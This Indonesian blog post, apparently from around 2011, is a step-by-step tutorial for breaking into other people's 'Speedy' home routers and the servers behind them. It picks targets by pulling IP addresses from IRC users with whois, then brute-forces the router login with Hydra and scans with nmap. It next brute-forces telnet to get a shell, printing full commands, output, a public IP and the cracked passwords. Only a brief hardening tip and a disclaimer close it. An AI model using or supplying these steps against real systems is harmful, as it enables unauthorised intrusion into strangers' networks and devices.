Inilah artikel mengenai banyak pengetahuan yang dapat membuat kita cerdas ataupun pintar dalam segala hal dan Jangan lupa berkomentar ya.

kali ini kita akan
jabarkan cara mendapatkan username dan password router dengan hydra.
Apakah anda suka cari
target di IRC untuk dihack router speedy atau di PC dibelakang router untuk
pentest? Apakah anda masih mengandalkan target yang mengandalkan router speedy
dengan keamanan password default yaitu user admin dan password admin ? Kalau
anda masih mengandalkan metode serangan password default, maka disini penulis
akan memberikan metode tambahan untuk anda yaitu metode brute force.
Disini penulis menggunakan
tool Hydra. Hydra adalah tool untuk melakukan hacking password dengan
menggunakan metode brute force, dengan anda memiliki kamus kata yang banyak
yang dimungkinkan passwordnya ada di dalam kamus tersebut.
Di sini penulis
contohkan misal kita join ke mIRC, kita contohkan saja nick ce_imutbgtt, nah
whois aja itu nick dan kita akan mendapatkan IPnya.
atau bisa juga kita
mengetahui IP router kita dengan cek arp-a misal router LAN 192.168.1.1 atau
check IP public di checkmyip.com
Setelah kita dapatkan IPnya
maka jalankan saja di browser IP address tersebut.
Setelah dijalankan http://180.254.70.135 maka akan tampil form window seperti dibawah
ini
Jika menggunakan
username admin dan password admin hasilnya adalah gagal maka anda akan
dihadapkan pada 2 hal, terus maju atau tinggalkan target.
Jika anda ingin terus
maju maka anda dapat menggunakan teknik brute force. Contohnya untuk melakukan
exploitasi dengan hydra adalah
H:\hydra>hydra -m /
-l admin -P data.txt 180.254.70.135 http-get
Hydra v6.0 (c) 2011 by
van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 14:27:56
[DATA] 11 tasks, 1
servers, 11 login tries (l:1/p:11), ~1 tries per task
[DATA] attacking
service http-get on port 80
[STATUS] attack
finished for 180.254.70.135 (waiting for childs to finish)
[80][www] host:
180.254.70.135 login: admin password: baseball
Hydra (http://www.thc.org) finished at 2011-10-17 14:27:57
H:\hydra>
Setelah kita masuk ke
router dengan password yang didapat, jika kita ingin melakukan hacking server
di belakang router maka kita dapat melakukan IP Forwarding dari router ke
Server yang berada dibelakang router.
Disini kita tidak tahu
IP-IP lokal berapa saja dibelakang router, karena itu kita dapat mengujinya
satu persatu dengan melakukan ping walaupun tidak jaminan.
Disini diasumsikan IP
Servernya adalah 192.168.1.2 setelah kita ping dapat.
D:\>ping
180.254.70.135
Pinging 180.254.70.135
with 32 bytes of data:
Reply from
180.254.70.135: bytes=32 time<1ms TTL=254
Reply from
180.254.70.135: bytes=32 time=2ms TTL=254
Reply from
180.254.70.135: bytes=32 time=11ms TTL=254
Reply from
180.254.70.135: bytes=32 time<1ms TTL=254
Setelah diping jalan
maka kita dapat mencoba melakukan scanning dengan NMAP
C:\>nmap -v -A 180.254.70.135
Starting Nmap 5.21 ( http://nmap.org ) at 2011-10-17 15:28 Pacific Daylight Time
NSE: Loaded 36 scripts
for scanning.
Initiating Ping Scan
at 15:28
Scanning
180.254.70.135 [4 ports]
Completed Ping Scan at
15:28, 0.53s elapsed (1 total hosts)
Initiating Parallel
DNS resolution of 1 host. at 15:28
Completed Parallel DNS
resolution of 1 host. at 15:28, 3.09s elapsed
Initiating SYN Stealth
Scan at 15:28
Scanning
180.254.70.135 [1000 ports]
Discovered open port
23/tcp on 180.254.70.135
Discovered open port
80/tcp on 180.254.70.135
Discovered open port
3389/tcp on 180.254.70.135
Discovered open port
21/tcp on 180.254.70.135
Completed SYN Stealth
Scan at 15:28, 2.34s elapsed (1000 total ports)
Disini dari scanning
dengan NMAP kita mendapatkan adanya port 23 yaitu port untuk telnet server.
Dengan aktifnya Telnet Server maka kita dapat melakukan brute force ke server
Telnet dengan Hydra.
H:\hydra>hydra -l administrator
-P data.txt 180.254.70.135 telnet
Hydra v6.0 (c) 2011 by
van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-10-17 15:21:22
[DATA] 6 tasks, 1
servers, 6 login tries (l:1/p:6), ~1 tries per task
[DATA] attacking
service telnet on port 23
[STATUS] attack
finished for 180.254.70.135 (waiting for childs to finish)
[23][telnet] host:
180.254.70.135 login: administrator password: sepakbola
Binggo, kita
mendapatkan password telnetnya.
Masukkan login dan
passwordnya dan kita akan mendapatkan shell dari telnet server. Contohnya :
Setelah kita klik
Open. Masukkan login dan passwordnya.
Binggo, kita masuk ke
shell server. :D
Pengamanannya jika
anda ingin tetap dapat dipanggil router speedynya dari luar, maka anda dapat
membuat password yang susah ditebak dengan berbagai kombinasi huruf dan angka
yang kompleks tapi tetap mudah diingat. Jika ingin lebih aman lagi ya tidak
perlu membuat router speedy bisa diakses dari internet, caranya misal dengan
melempar port 80 ke IP lain yang kosong atau tidak dipakai.
Saya tidak bertanggung
sama sekali atas semua hal-hal yang diakibatkan oleh artikel ini.
0 comments:
- Silahkan Beri komentar kritik dan saran
- Berkomentarlah yang sopan
- Dilarang spam
- Hargai Blog pembuat artikel
- Jika ingin copas | sertakan url / blog kami